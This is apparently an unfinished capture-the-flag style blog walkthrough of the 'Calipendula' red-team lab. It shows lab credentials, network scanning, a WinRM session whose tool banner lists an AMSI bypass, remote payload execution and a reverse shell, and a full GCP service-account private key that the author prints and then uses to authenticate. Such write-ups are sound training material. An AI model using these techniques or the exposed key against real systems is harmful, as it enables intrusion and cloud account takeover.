POSTS

ERTLabs: Calipendula

Calipendula is a hybrid GCP and Active Directory breach scenario, pushing you through cloud IAM enumeration, service account chaining, RBCD relay attacks, multi-hop tunnelling in a segmented network.

ERTLabs: Calipendula
1612 words · 8 min

Overview

Information

In this lab, you won’t just face vulnerabilities — you’ll walk a hidden path, where someone is pulling strings behind the scenes. Their actions are subtle, but their presence is undeniable.

Something — or someone — is at work. To move forward, you’ll have to pass through the clouds: ambiguity, noise, and deliberate misdirection. Nothing will be clear.

Every step will demand sharp instincts, patience, and a willingness to get lost before you find your way. But beyond the fog lies their partner — elusive, essential, and waiting.

If you can find them, earn their trust — or take control — you’ll gain the strength to turn the tide.

Together, you may just overpower the enemy who watches, anticipates, and thrives in the uncertainty.

Will you uncover the hidden alliance? Or will you vanish into the mist, just another ghost in the system?

Instructions

To access the lab, you can start a VPN session, and connect to the jump Kali machine with the following credentials, it’s all you need:

VPN:

  • 🔹 Get your VPN connection in the ⁠ask-vpn-for-labs channel by using the !getvpn command.

Kali Jump machine:

  • 🔹 Server: 10.0.9.200
  • 🔹 User: red
  • 🔹 Password: I’mthebest

AD Credentials:

Your Target: 10.0.9.0/24

Please acknowledge that you read this message.

————— NOTE ———————————- This Red Teaming lab is pretty easy

Warning
  • the final flag changes every hour
  • It is not necessary (but you can try) to become a Domain Admin of the Active Directory domains.
  • No privilege escalation is required on Linux computers.
  • Many systems act as bridges to access other systems.
  • Many systems contain secrets that will help you reach other systems.
  • Follow the ethical guidelines of a Red Teamer: keep all systems clean, and do not leave programs or files behind that could assist other competitors.
  • The Kali machine is only for jumping; you don’t need to perform Privilege Escalation.
  • NO BRUTEFORCE IN LAB PLEASE - IT’S A RED TEAM LAB NOT LAMER LAB
  • NO BRUTEFORCE IN LAB PLEASE - IT’S A RED TEAM LAB NOT LAMER LAB
  • NO BRUTEFORCE IN LAB PLEASE - IT’S A RED TEAM LAB NOT LAMER LAB

————— NOTE ———————————-

We strongly encourage you to work like a true Red Teamer and avoid leaving tools or traces that could assist other participants.

Enjoy the adventure!

CALIPENDULA

Grab our VPN package via Discord, then start it and let’s go:

$ sudo openvpn Downloads/EXTREME_RTLAB/user_978857802405675029.ovpn
$ sudo ip link set dev tun0 mtu 1350

Nmap

$ sshpass -p "I'mthebest" ssh -o 'StrictHostKeyChecking=accept-new' -o 'StrictHostKeyChecking=no' red@10.0.9.200
red@start:~$ cd /tmp/
red@start:/tmp$ mkdir .1
red@start:/tmp$ cd .1
red@start:/tmp/.1$ nmap -sn --min-rate=1000 -T4 10.0.9.0/24 -oN target_network.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-29 23:18 EDT
Nmap scan report for 10.0.9.10
Host is up (0.0013s latency).
MAC Address: 00:15:5D:38:01:23 (Microsoft)
Nmap scan report for 10.0.9.20
Host is up (0.0014s latency).
MAC Address: 00:15:5D:38:01:24 (Microsoft)
Nmap scan report for 10.0.9.116
Host is up (0.00086s latency).
MAC Address: 00:15:5D:38:01:10 (Microsoft)
Nmap scan report for 10.0.9.200
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 0.80 seconds

Found 4 hosts:

  • 10.0.9.10
  • 10.0.9.20
  • 10.0.9.116
  • 10.0.9.200 (already known as it’s our current Jumb box)
red@start:/tmp/.1$ nmap -Pn -p- --min-rate=5000 10.0.9.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-29 23:46 EDT
Nmap scan report for 10.0.9.10
Host is up (0.00051s latency).
All 65535 scanned ports on 10.0.9.10 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
MAC Address: 00:15:5D:38:01:23 (Microsoft)
red@start:/tmp/.1$ nmap -sCV -Pn -p- --min-rate=2000 -T4 10.0.9.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-29 23:42 EDT
Nmap scan report for 10.0.9.20
Host is up (0.00023s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 00:15:5D:38:01:24 (Microsoft)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: ACTARUS, NetBIOS user: <unknown>, NetBIOS MAC: 00:15:5d:38:01:24 (Microsoft)
| smb2-time: 
|   date: 2025-08-30T03:44:46
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -3s
$ nxc smb 10.0.9.20                                                   
SMB         10.0.9.20       445    ACTARUS          [*] Windows 10 / Server 2019 Build 19041 x64 (name:ACTARUS) (domin:calipendula.loc) (signing:False) (SMBv1:False)

Add actarus.calipendula.loc, calipendula.loc in in /etc/hosts

red@start:/tmp/.1$ nmap -sCV -Pn -p- --min-rate=2000 -T4 10.0.9.116
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-29 23:45 EDT
Nmap scan report for 10.0.9.116
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.9p1 Debian 3 (protocol 2.0)
| ssh-hostkey: 
|   256 b4:75:83:96:b5:5d:e1:ef:2f:fd:1c:af:92:f1:f0:07 (ECDSA)
|_  256 4b:90:66:a2:39:8c:78:04:e7:a0:93:8d:d9:62:92:43 (ED25519)
MAC Address: 00:15:5D:38:01:0E (Microsoft)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ACTARUS

Enumeration

$ nxc smb 10.0.9.20 -d calipendula.loc -u 'red' -p 'CaliLab0%' --shares
SMB         10.0.9.20       445    ACTARUS          [*] Windows 10 / Server 2019 Build 19041 x64 (name:ACTARUS) (domin:calipendula.loc) (signing:False) (SMBv1:False)
SMB         10.0.9.20       445    ACTARUS          [+] calipendula.loc\red:CaliLab0% 
SMB         10.0.9.20       445    ACTARUS          [*] Enumerated shares
SMB         10.0.9.20       445    ACTARUS          Share           Permissions     Remark
SMB         10.0.9.20       445    ACTARUS          -----           -----------     ------
SMB         10.0.9.20       445    ACTARUS          ADMIN$                          Remote Admin
SMB         10.0.9.20       445    ACTARUS          C$                              Default share
SMB         10.0.9.20       445    ACTARUS          IPC$            READ            Remote IPC

Nothing.

$ python3 winrmexec/evil_winrmexec.py 'calipendula.loc/red:CaliLab0%@actarus.calipendula.loc'     
[*] '-target_ip' not specified, using actarus.calipendula.loc
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://actarus.calipendula.loc:5985/wsman

Ctrl+D to exit, Ctrl+C will try to interrupt the running pipeline gracefully
This is not an interactive shell! If you need to run programs that expect
inputs from stdin, or exploits that spawn cmd.exe, etc., pop a !revshell

Special !bangs:
  !download RPATH [LPATH]          # downloads a file or directory (as a zip file); use 'PATH'
                                   # if it contains whitespace

  !upload [-xor] LPATH [RPATH]     # uploads a file; use 'PATH' if it contains whitespace, though use iwr
                                   # if you can reach your ip from the box, because this can be slow;
                                   # use -xor only in conjunction with !psrun/!netrun

  !amsi                            # amsi bypass, run this right after you get a prompt

  !psrun [-xor] URL                # run .ps1 script from url; uses ScriptBlock smuggling, so no !amsi patching is
                                   # needed unless that script tries to load a .NET assembly; if you can't reach
                                   # your ip, !upload with -xor first, then !psrun -xor 'c:\foo\bar.ps1' (needs absolute path)

  !netrun [-xor] URL [ARG] [ARG]   # run .NET assembly from url, use 'ARG' if it contains whitespace;
                                   # !amsi first if you're getting '...program with an incorrect format' errors;
                                   # if you can't reach your ip, !upload with -xor first then !netrun -xor 'c:\foo\bar.exe' (needs absolute path)

  !revshell IP PORT                # pop a revshell at IP:PORT with stdin/out/err redirected through a socket; if you can't reach your ip and you
                                   # you need to run an executable that expects input, try:
                                   # PS> Set-Content -Encoding ASCII 'stdin.txt' "line1`nline2`nline3"
                                   # PS> Start-Process some.exe -RedirectStandardInput 'stdin.txt' -RedirectStandardOutput 'stdout.txt'

  !log                             # start logging output to winrmexec_[timestamp]_stdout.log
  !stoplog                         # stop logging output to winrmexec_[timestamp]_stdout.log

PS C:\Users\red\Documents>

Quick check for his privileges:

PS C:\Users\red\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State  
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled

Check the users who have accessed to this server:

PS C:\Users\red\Documents> cd ../..
PS C:\Users> dir


    Directory: C:\Users


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
d-----         6/14/2025  11:27 PM                Administrator                                                         
d-----         8/26/2025   5:21 AM                alcor                                                                 
d-----         6/14/2025  11:27 PM                fox                                                                   
d-r---         4/20/2025   1:38 AM                Public                                                                
d-----         7/14/2025   1:23 PM                red                                                                   
d-----         6/14/2025  11:27 PM                tasko

Interesting as seems it’s protected by Kaspersky AV:

PS C:\Users> cd c:\programdata
PS C:\programdata> dir


    Directory: C:\programdata


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
d-----         4/20/2025   3:06 AM                Kaspersky Lab                                                         
d---s-         4/20/2025   1:40 AM                Microsoft                                                             
d-----         6/10/2025   3:03 AM                Microsoft OneDrive                                                    
d-----         4/20/2025   5:32 AM                Packages                                                              
d-----         8/29/2025  11:26 PM                regid.1991-06.com.microsoft                                           
d-----         12/7/2019   1:14 AM                SoftwareDistribution                                                  
d-----          5/5/2023   5:27 AM                ssh                                                                   
d-----         6/19/2025  10:18 PM                urck                                                                  
d-----         4/20/2025  10:33 AM                USOPrivate                                                            
d-----         12/7/2019   1:14 AM                USOShared                                                             
d-----         12/7/2019   1:54 AM                WindowsHolographicDevices                                             
-a----         6/10/2025   2:56 AM              8 a                                                                     
-a----          5/9/2025   2:12 AM              0 Kaspersky.exe

PS C:\programdata> dir "Kaspersky Lab"


    Directory: C:\programdata\Kaspersky Lab


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
d-----         7/12/2025   8:44 PM                AVP21.20                                                              
d-----         4/20/2025   3:06 AM                SafeBrowser                                                           
d-----         6/14/2025  11:20 PM                UCPStorage                      

Found: Kaspersky Endpoint Security service (AVP.KES.21.20) with a pretty updated version (2025 July)

Continue the enumeration and we found an interesting file in our Downloads folder:

PS C:\Users\red\Downloads> type calipendula-lab-106427aef42d7.json
{
  "type": "service_account",
  "project_id": "calipendula-lab",
  "private_key_id": "06427aef42d7237f828be45b5bdcdb46ab7f6384",
  "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDy9zmD2Z0FStSB\nDAYg2kAnIwX4zaFwSvp4qAx65VvgHXg+fhdHg9v2zE0xBr54PY9uAwoCFfgDTmkQ\nWuvDAgCQwmmu7yVs8G0QmxE2HHT6PalEhxLKjYNtmi/bYcv3rk/iknY92zDYJOHJ\nz4D0I7HWWMHdbq2R8iBmGzPuJPqhARjOvaI6EVogdtz8ybkALRi6hlcw9Slej6gq\ngAvJLV8fgawne+7qYg4ikAZ0sNDId0ayewaLApmebHt5bOVGLHeEHgp5QrPFxBLA\nDolK82BY/ELn1mAH411xjMLsKd8BnK5KrBH0vLeAeD15tRaZtXRfv++guBq6FyL2\nFwdozjS1AgMBAAECggEARqV8I8pyzcckYyGL5qGPZdHZOq8P8gbbLZovhsyKGnB3\nNjSTsEe2/dwJ1eeQGoZL3kEj99dLdiqmggrt4pYCdBUThbojt7lw/RMZvhIoMVsc\njMB5xku/m27p23BkTnBw6gCMQRAq865FuNiNNm/qldjZBfnYnkc5BHeEcgpulcGa\n1p4rF969GwZWGmkvJY0HdAsgSuVyKhou5+3+9ZCP7OndRFpqZ9eVYGHRHIAgR1pS\n4JIaMbo/Qejh2HC5wIsWvcCxeyvQhruinGKBFPAvvx1Kign4HibwCI/Etk4/KL2p\nIbrB6ZhqMw62Lh3ZLd5MIJd2L46y5BAZBMsFjCzjQQKBgQD9pk52cABAvGAVqVsh\n4hGtKnZ4iWCLRP1sTHLwKv5fv+GSvw8VdmV9Y2xKhCdYmw1d983jF8TkCmpqm7rp\nUT8JujPjRLR2z1c3F4pA9f3+1xYR4uwxYo3pjgrlSMk0EshrGC+YBi9kE7ZTBMKd\no2LqKTlkqkrM+6RxPUsMRz2YuwKBgQD1N5MLQF6grOjD4HIdsMBS1GFGm3dsqyNq\ne27QxOFUGI/XcZCMCtn/Hx+hTxiqls851Qw29XA1Tq+w+4nCjJ0oBxMAyR6GOYou\nFu4R2ccazL1v5lT7Ki7JcZbAiflrpSVFkd6oTTRJmSGoS9alg3DtiF8d5BdK6Zyl\n1YuSyTCJTwKBgQCClLpyGMjYiuIAZNaIxASLnH+vIDI2oIbC2TyWzdt02ai8TmXq\ni7BF9AhM+Gn1IKWqCafR0GvJZl9QkOmRsgT88gJCbx1kyOtCbnj7ZmijaIFxJdyo\ns+8RHNIZJfaHO2A4WhQudIizQb6sUJgMZY/Hsv9cBptJmgcXURGwuYBJfwKBgAnH\n26+ZM60I+IfHjgWtJR6opfChBtRoxxLaNYNSNwKZsDMRrohHboaEgUh31S4Isd9G\npiQTChS2PL+8aLQ/04zjK1jerL8B0IciFwDTROPGws+RylXySsdyJmcrma03exMZ\nTF4+JhXBa9xAmiEj6v8ub0zL6jnss3jR2a1TJQJ1AoGBAMh8HNjE3rfV97ispHQo\nZDkV5Wi1o2hoWTfBUvaJqevcFpXzT6VvCZEIcOyYekWFsoVgAQd3vuReFhcKYg3G\ngY2pJF41MQSAWuLmf6OmzFLVSFNmpAkENloy0J1U+jiRujaWH6SHm8/6m55q6Vix\n+3TM8xOkgZVikb2Gzq64zVJ7\n-----END PRIVATE KEY-----\n",
  "client_email": "calipendulasa@calipendula-lab.iam.gserviceaccount.com",
  "client_id": "101977309837071406665",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://oauth2.googleapis.com/token",
  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/calipendulasa%40calipendula-lab.iam.gserviceaccount.com",
  "universe_domain": "googleapis.com"
}

Go to GCP

Install the Google Cloud CLI (gcloud) on our Kali Linux:

  • Add the Google Cloud SDK distribution URI to your package sources:
$ echo "deb [signed-by=/usr/share/keyrings/cloud.google.gpg] https://packages.cloud.google.com/apt cloud-sdk main" | sudo tee -a /etc/apt/sources.list.d/google-cloud-sdk.list
  • Import the Google Cloud public key.
$ sudo apt install apt-transport-https ca-certificates gnupg
$ curl https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo gpg --dearmor -o /usr/share/keyrings/cloud.google.gpg
  • Update your package lists and install the gcloud CLI:
$ sudo apt update && sudo apt install google-cloud-cli
  • Authenticate to GCP using our JSON file:
$ gcloud auth activate-service-account --key-file=./calipendula-lab-106427aef42d7.json 
Activated service account credentials for: [calipendulasa@calipendula-lab.iam.gserviceaccount.com]

NEED SOME FREE TIME TO CONTINUE…